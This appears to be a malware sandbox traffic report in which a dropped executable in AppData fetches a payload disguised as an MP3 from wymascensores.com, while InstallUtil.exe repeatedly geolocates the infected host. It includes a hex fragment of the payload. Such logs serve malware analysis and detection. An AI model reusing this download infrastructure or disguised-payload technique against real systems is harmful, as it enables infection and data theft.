                        2024-09-26 07:57:59 UTC | 210 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:57:58 GMT
                        Server: Apache
                        Last-Modified: Wed, 25 Sep 2024 23:10:38 GMT
                        Accept-Ranges: bytes
                        Content-Length: 1841152
                        Connection: close
                        Content-Type: audio/mpeg


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        1 | 192.168.2.5 | 49706 | 188.114.96.3 | 443 | 5500 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-09-26 07:58:03 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        Connection: Keep-Alive
                        2024-09-26 07:58:03 UTC | 675 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:03 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2315
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XjLtXewIoUbmi6JkFlyyVfloVLCIuX43%2B2h6AgNTXg8AjIN98O8TuV0a2yhxSMk%2BrhVookpUttThfOIs2QKr0cC%2BaVjpeZCsQAprFGns5f9opxR42O9zjwY8Gj7ZDg9mleBDy06l"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b4e89c7b43b9-EWR
                        2024-09-26 07:58:03 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:03 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        2 | 192.168.2.5 | 49707 | 188.114.96.3 | 443 | 5500 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-09-26 07:58:04 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        2024-09-26 07:58:04 UTC | 677 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:04 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2316
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eheu6F0iVz%2Bm6hg9LKuYnaaYouSPJDpSYPcG6lXTwxu7es2P55y5Cl%2FzKrZ217nkpmEqd5mgMHNIv%2B2SU9NP7I4Maat%2FKzja4qrrAyrN19qIHTkdqoY1zv3c9pXCzHK3Q2j3yUQP"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b4edccb343c1-EWR
                        2024-09-26 07:58:04 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:04 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        3 | 192.168.2.5 | 49709 | 188.114.96.3 | 443 | 5500 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-09-26 07:58:07 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        2024-09-26 07:58:07 UTC | 683 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:07 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2319
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9h5%2FcBK5ZWGe%2B%2Fa9hVElgYzfQ9iFE4YDxk%2FZrAaj1wBWAkBMkdLKQPcfXaV2w5HAD4IhoHkTwd5L9I7iJ%2BHO8SHyA4iQZjuNcWAza3P8dm5xDzxSOEbdqs%2FS7lYHS2iNpOu1uG8%2B"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b500cab28c7b-EWR
                        2024-09-26 07:58:07 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:07 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        4 | 192.168.2.5 | 49711 | 188.114.96.3 | 443 | 5500 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-09-26 07:58:11 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        Connection: Keep-Alive
                        2024-09-26 07:58:11 UTC | 675 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:11 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2323
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cX8MjybkuNiKBUVHk1jw0q1IaP6mKvo9zX8mW5YWXoFJro%2FOWfoeybDdQVn0yqUZhLqLrder34gSe83cFWr3xWNXRnzrQgmsyo9%2FxhCi00ftBEN9XnX3D44SF3dn%2FnDGjJ464n8T"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b51c7a0d426b-EWR
                        2024-09-26 07:58:11 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:11 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        5 | 192.168.2.5 | 49712 | 67.212.175.162 | 443 | 5332 | C:\Users\user\AppData\Roaming\Gydvapkca.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-09-26 07:58:12 UTC | 86 | OUT | GET /panel/Skdqhzzwa.mp3 HTTP/1.1
                        Host: wymascensores.com
                        Connection: Keep-Alive
                        2024-09-26 07:58:12 UTC | 210 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:11 GMT
                        Server: Apache
                        Last-Modified: Wed, 25 Sep 2024 23:10:38 GMT
                        Accept-Ranges: bytes
                        Content-Length: 1841152
                        Connection: close
                        Content-Type: audio/mpeg
                        Data Ascii: 0038060000060000001B00000100000000000000005306000053060000060000001B000001062A000013300400340000004D00001120020000008D170000010A062000000000FE090000A2062001000000FE0901008C04000001A22000000000061428B0040006262A1B300600BE0100004E0000117E610100048E3A2900000


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        6 | 192.168.2.5 | 49714 | 188.114.96.3 | 443 | 5500 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-09-26 07:58:13 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        Connection: Keep-Alive
                        2024-09-26 07:58:13 UTC | 677 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:13 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2325
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dg%2BxtN0v23V0DIByp4jMbY0%2BarPSQ8Hhp9qBPu8pUD031GGDAQ5B8pnqGSjA5lKVsbI%2BjKz0doY37YVoFNdEKM6wKOviSaa4jCgoKzM5jmh4njWgHjTvz7TkLm%2B7epON1DB85aBx"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b5251ec91a07-EWR
                        2024-09-26 07:58:13 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:13 UTC | 5 | IN | Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        7 | 192.168.2.5 | 49722 | 188.114.96.3 | 443 | 5500 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-09-26 07:58:15 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        Connection: Keep-Alive
                        2024-09-26 07:58:16 UTC | 671 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:16 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2328
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5Qbsb5Lj9En4AzNX2hkmu0dl8ki9P9tMvMiDeaJJkR5y0jjq%2Fp1jyRMcSQ72C1vyv1WWq2wF0QU1ZZLvdjuwNaUFv8mrayghvugMACiFzRZKxwau0tTMs6AYmuoc4nFX9Yyq7TT1"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b53628857d14-EWR
                        2024-09-26 07:58:16 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:16 UTC | 5 | IN | Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        8 | 192.168.2.5 | 49727 | 188.114.96.3 | 443 | 3176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-09-26 07:58:17 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        Connection: Keep-Alive
                        2024-09-26 07:58:17 UTC | 675 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:17 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2329
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jos0ZlFgPzYo4sPhiEC0IyBD%2B6wSuXklHsY9kPzKyrsYtQkUpEFJ40s33lRJ4iQkf2vo0rLYcNXMsugUujwmjVQ1o4%2BiaGmOpKYmPIPXf0T3ULR5GIVUCRK54ud6L1Zd5tMW%2BAe2"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b541592b435b-EWR
                        2024-09-26 07:58:17 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:17 UTC | 5 | IN | Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        9 | 192.168.2.5 | 49728 | 188.114.96.3 | 443 | 3176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-09-26 07:58:18 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        2024-09-26 07:58:18 UTC | 681 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:18 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2330
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JkqD%2FFR%2BmJYK%2BNppSBYBNlsurAV5eytOAhx9njAqcBJTZZhmAuWAlDsHXmFUZYs5DnXK%2F7V9stANO%2F9ibgHB7fBTUMgQe30uhke4h4qeWMNknWZt2MQhRJCjS%2BLsqdAmNXE3ITQt"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b5462f600cd9-EWR
                        2024-09-26 07:58:18 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:18 UTC | 5 | IN | Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        10 | 192.168.2.5 | 49730 | 188.114.96.3 | 443 | 5500 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-09-26 07:58:19 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        2024-09-26 07:58:19 UTC | 683 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:19 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2331
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xdE5PCJZQs%2FznskTYzIoE5%2Fq94XSALFXJTqJu3bsZn%2F6mThoja9dvdN2snlNP2nzxGhoS%2FUT%2BPVkKAM%2BnNC0tT2ZW5JXPLAbf8l9MOiO17ivwmfxUokehYLGnvtJToCHqEMMK%2FrT"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b54c8dd35e73-EWR
                        2024-09-26 07:58:19 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:19 UTC | 5 | IN | Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        11 | 192.168.2.5 | 49731 | 188.114.96.3 | 443 | 3176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-09-26 07:58:19 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        Connection: Keep-Alive
                        2024-09-26 07:58:19 UTC | 685 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:19 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2331
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0YJWDI7SSOEMht%2F%2BnS4rr%2FuHqhGJyop67ebxB2j70qjGszpi5X%2FcoKmd6BmzoHxk8pv%2B8QNg99MmaFaaQtzs%2F2yIIraWdOgF051fqQqNUZpY04G4TpFUeTNI7%2BBuQe%2BnxUgXZ9yr"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b54e7a83420d-EWR
                        2024-09-26 07:58:19 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:19 UTC | 5 | IN | Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        12 | 192.168.2.5 | 49732 | 67.212.175.162 | 443 | 6716 | C:\Users\user\AppData\Roaming\Gydvapkca.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-09-26 07:58:20 UTC | 86 | OUT | GET /panel/Skdqhzzwa.mp3 HTTP/1.1
                        Host: wymascensores.com
                        Connection: Keep-Alive
                        2024-09-26 07:58:20 UTC | 210 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:19 GMT
                        Server: Apache
                        Last-Modified: Wed, 25 Sep 2024 23:10:38 GMT
                        Accept-Ranges: bytes
                        Content-Length: 1841152
                        Connection: close
                        Content-Type: audio/mpeg


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        13 | 192.168.2.5 | 49735 | 188.114.96.3 | 443 | 5500 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-09-26 07:58:20 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        Connection: Keep-Alive
                        2024-09-26 07:58:21 UTC | 687 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:21 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2333
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PHu48KBjKtXBhStibEa%2FjSVF5%2FBCfKDYsyVTlAQ0hn05c5E3avxiEHsGsfCcvN3c%2Fab%2B1C%2FYryqbRB77JVARU5kT9HGPQRamo3kQPEEdVnQuOrzi%2FkZWiKLzJ5urdPQfqrY%2Fnb%2F%2F"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b5558f084388-EWR
                        2024-09-26 07:58:21 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        14 | 192.168.2.5 | 49736 | 188.114.96.3 | 443 | 3176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-09-26 07:58:21 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        Connection: Keep-Alive
                        2024-09-26 07:58:21 UTC | 675 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:21 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2333
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9noQzGBZJHuSpD6ycorPiIkN3PK4iVaP21e9ySN4pNX1y92BchQyYSJHgRw9y8cVwsWlC%2BAxVlwyXpB%2FN1HHPHQaLNxm2kt4WsWgY5unw6CkF%2BGZWAeF71fyVSX5RDzNR5xvWqib"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b5569ee30fa8-EWR
                        2024-09-26 07:58:21 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        15 | 192.168.2.5 | 49739 | 188.114.96.3 | 443 | 3176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-09-26 07:58:23 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        Connection: Keep-Alive
                        2024-09-26 07:58:24 UTC | 673 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:24 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2336
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3a26l4iFVg15spp8Hpt%2F6kN9wA19Ixw6tVSBnj5fNUKNSgEQDnEuxxEGTe46wsam7T4hr3nQXzrWgFWBl4QlUOOBrAuRQiHAj2z%2B5s37S0MSyQETkWgqWPRzhoY2doF2cNJoHHiS"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b5682e9243ed-EWR
